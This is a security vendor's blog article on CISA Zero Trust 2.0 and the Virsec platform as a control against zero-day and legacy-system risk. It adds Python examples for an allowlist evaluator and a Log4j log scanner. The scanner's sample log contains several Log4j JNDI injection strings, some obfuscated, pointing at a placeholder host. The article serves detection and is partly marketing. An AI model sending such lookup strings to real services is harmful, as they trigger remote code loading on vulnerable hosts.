In April 2023, CISA released Zero Trust Maturity Model Version 2, which added a fourth security maturity level and reaffirmed application and workload cyber requirements.
In this article we consider Application Threat Protections security levels within the Applications and Workloads pillar, and the additional mitigation required for residual risk. We will also supply a solution to address those residual risks.
Here are the new maturity levels for Threat Protections within the Applications and Workloads Pillar.
Table 1: Application and Workload: Threat Protections

| Maturity Factor | Traditional | Initial | Advanced | Optimal |
|---|---|---|---|---|
| App Workflow Integration | Minimal Integration | Basic Integration (mission critical apps) | Complete integration (all apps) | Dynamic Integration (all apps) |
| Threat scope | | | | |
| Residual Risks | 1) Legacy: Unsupported Hardware, Software, OSs 2) Zero Day Attacks | | | |
In moving through the maturity levels (left to right in the Application and Workload: Threat Protections table above), your agency reduces its risk, with an ever-shrinking residual risk to its applications and workloads.
However, there are still two residual risk scenarios, regardless of the level of maturity the agency reaches: Legacy systems and Zero-Day attacks.
Legacy Systems
Legacy systems, in this article's context, are systems that cannot move through the maturity model because they are no longer supported. Examples include Windows 2003, Windows 2008 R2, and Microsoft Exchange 2013.
Traditional endpoint security (EDR/MDR/XDR) relies on post-incident detection and response and is challenged to stop zero-day persistent threats. These attacks often pin agencies down with tough decisions, such as turning off compromised services during an attack to block the active threat.
Agencies may still have these legacy systems deployed. Over time, bad actors find and exploit the legacy systems, because no supported mitigations are available from the product or security vendors. Adversaries also create new risk by finding new vulnerabilities in legacy systems.
Legacy systems' endpoint risks can often be mitigated with technical compensating controls, such as an inline Intrusion Prevention System (IPS) placed in front of the legacy systems. IPS is highly effective against vulnerabilities with known signatures and scales across multiple endpoints, but because IPS relies on signature-based identification, the host remains susceptible to Zero-Day attacks.
Zero-Day Attacks
Zero-Day attacks exploit vulnerabilities that are not yet known, so there is no pattern (signature) to match the tactics and techniques used by bad actors.
Enter Virsec
Virsec, a T-Rex partner, stands in the gap between Zero Trust functions and Zero-Day attacks. By protecting apps and workloads from unknown attacks, as shown below, Virsec completes the Zero-Day architecture.
Figure 1: Enter Virsec: Zero Trust Security Posture
Virsec Security Platform (VSP)
The Virsec Security Platform supports Zero Trust 2.0 Application and Workload protection. The support comes in the form of a complementary Zero Trust approach as shown in the VSP Protection Engines shown below:
Figure 2: Virsec Security Platform (VSP)
Host Protection
The security engineer manages the host protection capabilities through two tabs in the VSP web interface: host protection and application control policies (ACP) as shown here:
Figure 3: Virsec Menu
The Host Protection table (shown below) allows the security engineer to curate and refine the Allowlist, as well as apply application control policies. VSP also supports three states for each endpoint: Disabled, Protect, and Detect (Detect highlighted in blue) allowing granular control for change control and acceptance during Zero Trust projects.
Figure 4: Host Protection Table
App Control Policies
In addition to the host protections shown in the Host Protection Table (above), VSP also supports OS-based, application-level protections through App Control Policies (ACPs). The security engineer may apply ACPs at the same time as Host Protections, or later, to limit the amount of change during deployments.
The following screenshot gives an example of one Linux and two Windows ACPs:
Figure 5: Linux and Windows ACP
For a complete list of supported Operating Systems, please refer to VSP2.8_CompatibilityGuide.pdf (virsec.com)
VSP ships with a variety of ACPs. To get a feeling for the functionality, here is one of the default out-of-the-box Application Control Policy (ACP) templates for Linux systems, which applies a strict match to protect the native Linux route command:
Figure 6: Default ACP
Call Out: Commands such as route, arp, ping, and ifconfig have valid uses for cyber and system staff, but they are also ideal discovery tools for hackers seeking targets.
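To make the allowlist and host-state ideas concrete, here is an added example in Python; it is not Virsec's code or policy format. It models the three host states listed above (Disabled, Detect, Protect) and a strict-match rule in the spirit of the default route template: a process launch is allowed only when the executable path, a hash of the executable, the exact argument vector and, where set, the parent process all match a rule. Because anything not explicitly allowed is a violation, no signature of the attack is needed to act on it. The stand-in binaries, hashes, paths and events are all constructed for the example.

```python
"""Toy application-control policy (ACP) evaluator (added example, not Virsec code)."""
import hashlib
from dataclasses import dataclass
from enum import Enum
from typing import Optional, Tuple


class HostState(Enum):
    DISABLED = "disabled"   # policy not enforced, nothing logged
    DETECT = "detect"       # violations are logged, not blocked
    PROTECT = "protect"     # violations are blocked


@dataclass(frozen=True)
class Rule:
    """One allowlist entry. Every populated field must match exactly."""
    path: str
    sha256: str
    args: Tuple[str, ...] = ()        # exact argument vector after argv[0]
    parent: Optional[str] = None      # required parent executable, if any


@dataclass(frozen=True)
class ProcessEvent:
    """A process-launch event as an endpoint sensor might report it (constructed)."""
    path: str
    image: bytes                      # executable contents, hashed below
    args: Tuple[str, ...]
    parent: str


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def rule_matches(rule: Rule, event: ProcessEvent) -> bool:
    """Strict match: path, image hash, argv and (if set) parent must all agree."""
    if rule.path != event.path:
        return False
    if rule.sha256 != sha256_hex(event.image):
        return False
    if rule.args != event.args:
        return False
    if rule.parent is not None and rule.parent != event.parent:
        return False
    return True


def evaluate(state: HostState, rules: Tuple[Rule, ...], event: ProcessEvent) -> str:
    """Return the verdict: 'allow', 'alert' (Detect state) or 'block' (Protect state)."""
    if state is HostState.DISABLED:
        return "allow"
    if any(rule_matches(r, event) for r in rules):
        return "allow"
    return "block" if state is HostState.PROTECT else "alert"


# Constructed stand-ins for executable contents; a real rule would hash the file on disk.
GENUINE_ROUTE = b"ELF stand-in: genuine /sbin/route (constructed)"
TAMPERED_ROUTE = b"ELF stand-in: replaced /sbin/route (constructed)"

# The allowlist: operators may run `route -n` or a bare `route`, only from an interactive shell.
ROUTE_RULES = (
    Rule("/sbin/route", sha256_hex(GENUINE_ROUTE), ("-n",), parent="/bin/bash"),
    Rule("/sbin/route", sha256_hex(GENUINE_ROUTE), (), parent="/bin/bash"),
)

# Constructed events: an admin listing routes, an admin changing routes (not allowed),
# a web-application process spawning route (discovery), and a replaced binary.
ADMIN_LISTING = ProcessEvent("/sbin/route", GENUINE_ROUTE, ("-n",), "/bin/bash")
ADMIN_MODIFY = ProcessEvent("/sbin/route", GENUINE_ROUTE, ("add", "default", "gw", "10.0.0.1"), "/bin/bash")
WEBAPP_SPAWN = ProcessEvent("/sbin/route", GENUINE_ROUTE, ("-n",), "/usr/bin/java")
TAMPERED_BIN = ProcessEvent("/sbin/route", TAMPERED_ROUTE, ("-n",), "/bin/bash")


def demo() -> dict:
    """Evaluate each constructed event under every host state; returns verdicts by name."""
    out = {}
    for name, ev in (("admin_listing", ADMIN_LISTING), ("admin_modify", ADMIN_MODIFY),
                     ("webapp_spawn", WEBAPP_SPAWN), ("tampered_bin", TAMPERED_BIN)):
        out[name] = {
            "protect": evaluate(HostState.PROTECT, ROUTE_RULES, ev),
            "detect": evaluate(HostState.DETECT, ROUTE_RULES, ev),
            "disabled": evaluate(HostState.DISABLED, ROUTE_RULES, ev),
        }
    return out


if __name__ == "__main__":
    for name, verdicts in demo().items():
        print(f"{name:14s} {verdicts}")
```

The Detect state is what makes staged rollout possible: a policy can be deployed in Detect first, the alerts reviewed to find legitimate launches the allowlist is missing, and the host switched to Protect once the alert stream is clean.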
Additional VSP Application Protections
VSP's Application Protection supplies added Zero Trust Application Protection (ZTAP) by automatically instrumenting the application workflow for multi-layer, in-line monitoring through the application stack. For example, the Tomcat/Java stack has multiple sectors and surfaces for attack; VSP enables protection across those sectors. Here is an example protection stack screenshot from the VSP console:
Figure 7: Additional VSP Protections (Vulnerability Protection)
VSP in Action: Log4j Zero-Day Scenario
This section covers VSP in action against a Zero-Day attack. The example scenario uses Kali Linux and a Log4j attack against a Windows 2012 host. It covers both residual-risk scenarios, Zero-Day and legacy, because the host has no supported malware/endpoint protection stack available. (Simulating a Zero-Day attack realistically is a chicken-and-egg problem now that Log4j has been mitigated, so the host was set up with no host protections.)
The following diagram shows how VSP stops Log4j at multiple stages of the attack.
Figure 8: Virsec Security Platform (VSP) – Applied Security Compensating Controls to Log4j
Here is the Host Protection policy for the victim (attacked) host:
Figure 9: Host Protection policy for the attacked host
For Application and Workload protections, VSP protects at the host level and the web application level.
The incident log for VSP protecting the victim is shown here:
Figure 10: Incident Log for VSP
The hacker would then experience the following output from the Log4j attack attempt.
Figure 11: Hacker Output Screen
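As an added, defender-side complement to the scenario above (this is example code, not part of the article and not how the Virsec Security Platform works; VSP acts inside the running workload, while this runs afterwards over access logs), the following Python scans constructed web-server access-log lines for the `${jndi:` lookup string that Log4j attack requests carry. It URL-decodes each line and collapses the publicly documented `${lower:..}` / `${upper:..}` inner lookups so that a disguised lookup is still recognised. The log lines, client IPs and the `lookup-host.example` hostname are constructed placeholders.

```python
"""Scan access logs for Log4j JNDI lookup strings (added example, not Virsec code)."""
import re
from typing import List, Tuple
from urllib.parse import unquote

# Inner lookups that only change case, e.g. ${lower:J} -> j.
_CASE_LOOKUP = re.compile(r"\$\{(lower|upper):([^${}]*)\}", re.IGNORECASE)
# The outer lookup we want to find, tolerating stray whitespace.
_JNDI_LOOKUP = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def normalise(text: str) -> str:
    """URL-decode and resolve nested case lookups until the text stops changing."""
    text = unquote(text)
    previous = None
    while previous != text:
        previous = text
        text = _CASE_LOOKUP.sub(
            lambda m: m.group(2).lower() if m.group(1).lower() == "lower" else m.group(2).upper(),
            text,
        )
    return text


def contains_jndi_lookup(text: str) -> bool:
    """True if the (normalised) text carries a ${jndi: lookup."""
    return _JNDI_LOOKUP.search(normalise(text)) is not None


# Constructed Apache combined-format access log. Line 2 carries the lookup in the
# User-Agent, line 3 carries it URL-encoded in the query string, line 4 uses a
# case-lookup disguise, and line 5 merely mentions the word "jndi" (no lookup).
SAMPLE_LOG = """\
10.0.0.5 - - [10/Dec/2021:12:00:01 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.9 - - [10/Dec/2021:12:00:02 +0000] "GET /login HTTP/1.1" 200 1024 "-" "${jndi:ldap://lookup-host.example/a}"
10.0.0.9 - - [10/Dec/2021:12:00:03 +0000] "GET /search?q=%24%7Bjndi%3Aldap%3A%2F%2Flookup-host.example%2Fb%7D HTTP/1.1" 404 0 "-" "curl/7.0"
10.0.0.9 - - [10/Dec/2021:12:00:04 +0000] "GET /api HTTP/1.1" 200 10 "-" "${${lower:J}ndi:rmi://lookup-host.example/c}"
10.0.0.7 - - [10/Dec/2021:12:00:05 +0000] "GET /docs?q=jndi+tutorial HTTP/1.1" 200 10 "-" "Mozilla/5.0"
"""


def scan(log_text: str) -> List[Tuple[int, str]]:
    """Return (line number, client IP) for every line carrying a JNDI lookup."""
    hits = []
    for lineno, line in enumerate(log_text.splitlines(), start=1):
        if contains_jndi_lookup(line):
            hits.append((lineno, line.split(" ", 1)[0]))
    return hits


if __name__ == "__main__":
    for lineno, ip in scan(SAMPLE_LOG):
        print(f"line {lineno}: JNDI lookup from {ip}")
```

A hit in this scan means a lookup string reached the web tier; whether it was evaluated depends on the Log4j version and configuration behind it, so each hit should be correlated with the application's own logs and outbound connection records rather than treated as a confirmed compromise.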
Summary
The CISA Zero Trust 2.0 Maturity Model increases the granularity of the model; however, addressing the inherent issues of Zero-Day exploits and of legacy systems with unpatched vulnerabilities requires added solutions and innovation. The Virsec Security Platform (VSP) is a strong solution to fill the gap for Zero-Day attacks and close the widening gap in securing legacy systems through its built-in capabilities: stopping Zero-Day attacks, ensuring zero dwell time, and continuous run-time protection.
T-Rex’s cybersecurity engineers and architects work with Federal agencies to speed their Zero Trust endeavors through T-Rex’s Zero Trust Accelerator and innovative tooling as shown here. Contact us at cybersecurity@trexsolutionsllc.com to discuss how we can assist in your Zero Trust program.